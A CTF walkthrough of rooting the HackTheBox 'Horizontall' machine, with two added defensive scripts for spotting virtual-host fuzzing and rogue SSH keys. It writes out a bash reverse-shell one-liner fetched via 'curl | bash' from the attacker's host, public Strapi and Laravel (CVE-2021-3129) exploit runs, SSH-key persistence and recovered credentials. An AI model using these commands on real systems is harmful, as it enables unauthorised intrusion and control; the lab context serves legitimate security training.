Horizontall HackTheBox WalkThrough
This is the Horizontall HackTheBox machine walkthrough. In this writeup, I have demonstrated step by step how I rooted the Horizontall HackTheBox machine. Before starting, let us know something about this box. It is a Linux OS box with IP address 10.10.11.105 and difficulty level easy, as assigned by its maker.
First of all, connect your PC to the HackTheBox VPN and confirm your connectivity with the Horizontall machine by pinging its IP 10.10.11.105. If all goes correctly, it's time to start hacking.
As usual, I started by scanning the machine. Scanning gives us an idea of how to proceed further: it helps with banner grabbing of the various services running on different ports, and sometimes it helps with vulnerability assessment as well. I used $ nmap (a popular port scanner) for this task and the result is given below:
Scanning
$ sudo nmap -sC -sV -p- -oN full-port.nmap 10.10.11.105
The full port scan with nmap revealed ports 22 and 80 as open. OpenSSH 7.6p1 is running on port 22 and the nginx 1.14.0 web server is running on port 80. I googled for vulnerabilities in OpenSSH and nginx but found nothing useful. Also, the nmap script http-title revealed a virtual host horizontall.htb. So, before going further with any enumeration, let us add horizontall.htb to our hosts file; the hosts file is located in the directory /etc/.
Hosts File After Modification 1
$ cat /etc/hosts
On visiting the URL http://horizontall.htb/ I got a simple UI saying Build website using HT. After checking the source code and other things on the website, I could not find any useful information.
So I moved on to directory and virtual host bruteforcing. Directory bruteforcing with $ dirsearch and the wordlist directory-list-2.3-medium.txt couldn't find any useful file or folder. But virtual host bruteforcing with $ ffuf and the wordlist subdomains-top1million-110000.txt found a virtual host api-prod.horizontall.htb.
$ ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://horizontall.htb -H "Host: FUZZ.horizontall.htb" -mc 200 -c
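From the defender's side, a virtual-host brute force like the one above leaves a very recognisable trace: one client sending many requests whose Host header differs on almost every request. The following script is an added example (not part of the original writeup) that parses nginx access-log lines and flags any client that requested more than a threshold of distinct Host names inside a sliding time window. It assumes a custom nginx `log_format` that appends `$host` as a final quoted field, because the default "combined" format does not record the Host header; the log lines, IPs and user agent in the sample are constructed.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime

# nginx's default "combined" format does not record the Host header. This parser assumes a
# custom log_format that appends "$host" as a final quoted field (an assumption, not the box's config):
#   log_format vhost '$remote_addr - $remote_user [$time_local] "$request" $status '
#                    '$body_bytes_sent "$http_referer" "$http_user_agent" "$host"';
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)" "(?P<host>[^"]*)"$'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect_vhost_fuzzing(lines, min_distinct_hosts=20, window_seconds=60):
    """Return {client_ip: peak number of distinct Host values seen within one window}
    for every client that reached min_distinct_hosts different Host names in window_seconds."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append((rec["time"], rec["host"]))

    flagged = {}
    for ip, events in per_ip.items():
        events.sort(key=lambda e: e[0])
        window = deque()        # events currently inside the sliding window
        in_window = Counter()   # host -> number of events in the window
        peak = 0
        for ts, host in events:
            window.append((ts, host))
            in_window[host] += 1
            # evict events that fell out of the window
            while (ts - window[0][0]).total_seconds() > window_seconds:
                _, old_host = window.popleft()
                in_window[old_host] -= 1
                if in_window[old_host] == 0:
                    del in_window[old_host]
            peak = max(peak, len(in_window))
        if peak >= min_distinct_hosts:
            flagged[ip] = peak
    return flagged


def build_sample_lines():
    """Constructed sample log: one ordinary visitor plus a client cycling through 30 Host names."""
    lines = [
        '10.10.14.2 - - [14/Sep/2021:09:59:50 +0000] "GET / HTTP/1.1" 200 901 '
        '"-" "Mozilla/5.0" "horizontall.htb"'
    ]
    for i in range(30):
        lines.append(
            f'10.10.16.7 - - [14/Sep/2021:10:00:{i:02d} +0000] "GET / HTTP/1.1" 200 901 '
            f'"-" "fuzzer/1.0" "sub{i}.horizontall.htb"'
        )
    return lines


SAMPLE_LINES = build_sample_lines()

if __name__ == "__main__":
    for ip, n in detect_vhost_fuzzing(SAMPLE_LINES).items():
        print(f"{ip}: {n} distinct Host values within 60s -> possible virtual-host brute force")
```

Feed it `open("/var/log/nginx/access.log")` instead of `SAMPLE_LINES` once the `$host` field is in your log format. Counting distinct Host values rather than raw request volume is what separates this activity from a normal crawler, which hammers one hostname with many paths.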
Let us add api-prod.horizontall.htb to our hosts file.
Hosts File After Modification 2
$ cat /etc/hosts
On going to the URL http://api-prod.horizontall.htb/ I found a simple page containing Welcome.
Then I directory brute forced this subdomain using $ dirsearch and the wordlist directory-list-2.3-medium.txt.
$ sudo dirsearch -u http://api-prod.horizontall.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e all -x 404,403,301,303 -t 100
Directory bruteforcing revealed the admin and reviews pages. On going to http://api-prod.horizontall.htb/admin/ I found the login page of the strapi CMS.
Then I googled for the version of strapi CMS, the vulnerabilities associated with it, and how to find the version of strapi CMS being used. Luckily, I found this link which shows how to find the version of strapi CMS. Following the link http://api-prod.horizontall.htb/admin/strapiVersion I found that the installed version of strapi is 3.0.0-beta.17.4.
Then a quick googling of the vulnerabilities of strapi CMS revealed that version 3.0.0-beta.17.4 is vulnerable to Unauthenticated Remote Code Execution and a public exploit is also available. Check this link on exploit-db.
Tip: Whenever you obtain any software or framework version during the enumeration phase of a CTF, it is always a good idea to check the vulnerabilities associated with that version.
Confirming RCE
To confirm Remote Code Execution on the Horizontall machine, follow the steps below.
$ wget https://www.exploit-db.com/download/50239 -O exploit.py
$ python3 exploit.py http://api-prod.horizontall.htb
$> whoami
After successful exploitation we get an authenticated JSON Web Token and the credential admin:SuperStrongPassword1.
We can use this credential to log in at the URL http://api-prod.horizontall.htb/admin/. Since it is a blind RCE, we can't see any output on screen. We can confirm this from the above screenshot.
Checking Connectivity with Kali Machine
To confirm whether we can get a reverse shell to our Kali machine, we need to check the connectivity of the Horizontall machine with our Kali machine. To check connectivity, I pinged my Kali box from the Horizontall machine and the pings came through.
$> ping -c 3 10.10.16.7
$ sudo tcpdump -i tun0 icmp
Now it's time to get a reverse shell using a one-liner. You can get a list of one-liners from this link.
Getting User Shell
To get a reverse shell follow the given steps:
On Kali Machine
In window 1
$ echo '#!/usr/bin/bash'>shell.sh
$ echo 'bash -i >& /dev/tcp/10.10.16.7/9001 0>&1'>>shell.sh # Don’t forget to replace the IP with your Kali machine IP
$ cat shell.sh
$ sudo python3 -m http.server 80
In window 2
$ nc -nvlp 9001
$ whoami && id
On Horizontall Machine
$> curl http://10.10.16.7/shell.sh | bash
We have successfully got a user shell. Let us upgrade it to a fully interactive Linux shell so that we can run more advanced Linux commands through it.
Upgrading Shell
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
$ CTRL + Z # to background the shell
$ stty raw -echo
$ fg # then press enter 2 times to foreground the shell
$ export TERM=xterm-256color
$ stty -a | head -n1
$ stty rows 43 columns 174
Capture User Flag
$ cat /home/developer/user.txt
Privilege Escalation
To escalate privileges to root we first have to find a privilege escalation vector. We can find a PrivEsc vector either manually or using post-exploitation enumeration scripts like linpeas.sh, LinEnum.sh and many more. This time I went for manual enumeration.
Finding PrivEsc Vector
$ ss -lnpt
This command revealed that ports 3306, 1337 and 8000 are listening locally. There must be some services running on them.
A MySQL server is running on port 3306. I tried to log in to the server using the credential developer:#J!:F9Zt2uI. I got this credential from the file database.json which is present in the directory /opt/strapi/myapi/config/environments/development/. But there was no useful information in the databases.
When I tried to access port 1337 it didn't respond. After accessing the service on port 8000 through the URL http://127.0.0.1:8000 I found that the application running there is built with Laravel v8.
$ curl http://127.0.0.1:8000 | grep -A3 -B4 -i "Laravel v8"
As soon as I got information about Laravel, I searched for the vulnerability and its exploit. After some research I found that Laravel (<=v8.4.2) is vulnerable to Remote Code Execution when debug mode is enabled. For more info about this vulnerability check CVE-2021-3129. After checking the exploit at this URL I found that it downloads the phpggc library from GitHub while it executes on the vulnerable machine. Since HackTheBox machines don't have access to the external Internet, we can't execute this exploit on the Horizontall machine. For this we have to local port forward port 8000 to our Kali machine; only then can we execute the exploit. Check the 5th line from the end in the code in the screenshot below.
We will use SSH for local port forwarding. But we don't have any SSH credential yet, so we need to create one. Since we have access to the strapi user, we can put our SSH public key from our id_rsa.pub file into the authorized_keys file of user strapi and then connect to the Horizontall machine using our SSH private key, i.e. id_rsa. So let us create an RSA key pair using the command $ ssh-keygen.
On Kali Machine
$ ssh-keygen
$ cat ~/.ssh/id_rsa.pub
On Horizontall Machine
$ pwd
$ mkdir .ssh
$ echo "ssh-rsa <PUBLIC-KEY-REMOVED> deepak@kali">/opt/strapi/.ssh/authorized_keys
$ cat /opt/strapi/.ssh/authorized_keys
We have successfully transferred our public key to the authorized_keys file of user strapi on Horizontall.
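Dropping a key into a service account's authorized_keys, as above, is a classic persistence step, and it is one of the easiest to audit for. The script below is an added example (not part of the writeup) that parses authorized_keys files, computes the OpenSSH-style SHA256 fingerprint of every key (the same value `ssh-keygen -lf` prints) and lists any key whose fingerprint is not on an allow-list. The two key blobs in the sample are constructed with a deterministic stand-in for the public key bytes, so they are syntactically valid but are not real keys; the comments and allow-list are constructed too.

```python
import base64
import hashlib

KEY_TYPE_PREFIXES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-", "sk-")


def fingerprint(b64_blob):
    """OpenSSH SHA256 fingerprint of a base64 key blob: base64(sha256(blob)) without padding."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Yield one dict per key line (options, type, fingerprint, comment); skip blanks and comments.
    Lines that cannot be parsed are reported with an 'error' field rather than silently dropped."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        # options (e.g. command="...", from="...") may precede the key type
        idx = next((i for i, t in enumerate(tokens) if t.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(tokens):
            yield {"line": lineno, "error": "unparseable", "raw": line}
            continue
        yield {
            "line": lineno,
            "options": " ".join(tokens[:idx]),
            "type": tokens[idx],
            "fingerprint": fingerprint(tokens[idx + 1]),
            "comment": " ".join(tokens[idx + 2:]),
        }


def audit_authorized_keys(text, allowed_fingerprints):
    """Return entries whose fingerprint is not on the allow-list, plus any unparseable lines."""
    return [e for e in parse_authorized_keys(text)
            if "error" in e or e["fingerprint"] not in allowed_fingerprints]


def _constructed_blob(label):
    """Build a syntactically plausible ssh-ed25519 blob for the sample (NOT a real key)."""
    name = b"ssh-ed25519"
    body = hashlib.sha256(label.encode()).digest()   # 32 bytes stand in for the public key
    blob = len(name).to_bytes(4, "big") + name + len(body).to_bytes(4, "big") + body
    return base64.b64encode(blob).decode()


APPROVED_BLOB = _constructed_blob("approved-admin-key")
ROGUE_BLOB = _constructed_blob("rogue-key")

# Constructed sample file: one key that is on the allow-list and one that is not.
SAMPLE_AUTHORIZED_KEYS = f"""\
# keys managed by config management (constructed sample)
ssh-ed25519 {APPROVED_BLOB} admin@bastion
ssh-ed25519 {ROGUE_BLOB} deepak@kali
"""

ALLOWED_FINGERPRINTS = {fingerprint(APPROVED_BLOB)}

if __name__ == "__main__":
    for entry in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWED_FINGERPRINTS):
        print("unexpected key:", entry)
```

In practice you would run `audit_authorized_keys` over `/home/*/.ssh/authorized_keys` and the `.ssh` directories of service accounts such as the `/opt/strapi` home used above, with the allow-list populated from whatever provisions keys legitimately. Comparing fingerprints rather than comments matters because the comment field (`deepak@kali` above) is free text that anyone writing the file can set.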
Local Port Forwarding
Let us log in to the strapi SSH account using our id_rsa key and local port forward port 8000 to our Kali machine.
$ chmod 400 ~/.ssh/id_rsa
$ ssh -i ~/.ssh/id_rsa -L 8000:127.0.0.1:8000 [email protected]
We can check the forwarded port using the command $ ss -lnpt.
Now we can access the service running on port 8000 of the Horizontall machine through port 8000 on our Kali machine using the URL http://localhost:8000/.
When I tried to escalate privileges using this exploit, I could easily perform privilege escalation. So here our potential PrivEsc vector is privilege escalation by exploiting a vulnerable software version.
Getting Root by Privilege Escalation
To perform privilege escalation, follow the steps given at this URL or the steps below.
$ git clone https://github.com/nth347/CVE-2021-3129_exploit.git
$ cd CVE-2021-3129_exploit
$ chmod +x exploit.py
$ ./exploit.py http://localhost:8000 Monolog/RCE1 id
We can clearly see that we have successfully escalated privileges to root, as the output of the $ id command is uid=0(root) gid=0(root) groups=0(root).
Capture Root Flag
Let us capture root flag.
$ ./exploit.py http://localhost:8000 Monolog/RCE1 'cat /root/root.txt'
This was how I rooted the Horizontall HackTheBox machine. I learnt a lot from this challenge; I hope you have also learnt something new. Thanks for reading this walkthrough. For any query or suggestion about the walkthrough feel free to write to us at [email protected]